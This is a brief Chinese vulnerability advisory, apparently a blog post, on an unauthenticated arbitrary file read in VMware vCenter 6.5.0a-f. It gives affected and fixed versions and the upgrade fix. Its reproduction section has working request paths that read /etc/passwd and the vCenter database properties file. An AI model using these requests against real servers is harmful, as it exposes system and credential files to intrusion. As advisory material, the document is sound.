VMware vCenter任意文件读取漏洞

VMware vCenter任意文件读取漏洞

一、漏洞描述

VMware vCenter 服务器是一种高级服务器管理软件,提供一个用于控制 VMware vSphere 环境的集中式平台,帮助用户获取集中式可见性、简单高效的规模化管理,从而在整个混合云中自动部署和交付虚拟基础架构。

VMware vCenter特定版本存在任意文件读取漏洞。未经身份验证的攻击者可通过向目标系统发送特制请求包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统读取任意文件。

二、漏洞影响版本

已知影响版本 VMware vCenter 6.5.0a-f

安全版本 VMware vCenter 6.5u1

三、漏洞复现

poc:

#windows
/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
#linux
/eam/vib?id=/etc/passwd

VMware vCenter任意文件读取漏洞

四、漏洞修复

升级至6.5u1修复版本。

 

-----------------------------------------------------------------------------------------------------------

参考:https://www.jianshu.com/p/cdcec329be28

相关文章:

  • 2022-12-23
  • 2021-10-02
  • 2021-07-13
  • 2022-01-02
  • 2021-11-20
  • 2021-04-09
  • 2022-01-25
  • 2022-12-23
猜你喜欢
  • 2021-06-05
  • 2022-12-23
  • 2021-07-14
  • 2021-10-30
  • 2022-12-23
  • 2022-01-07
  • 2021-12-31
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode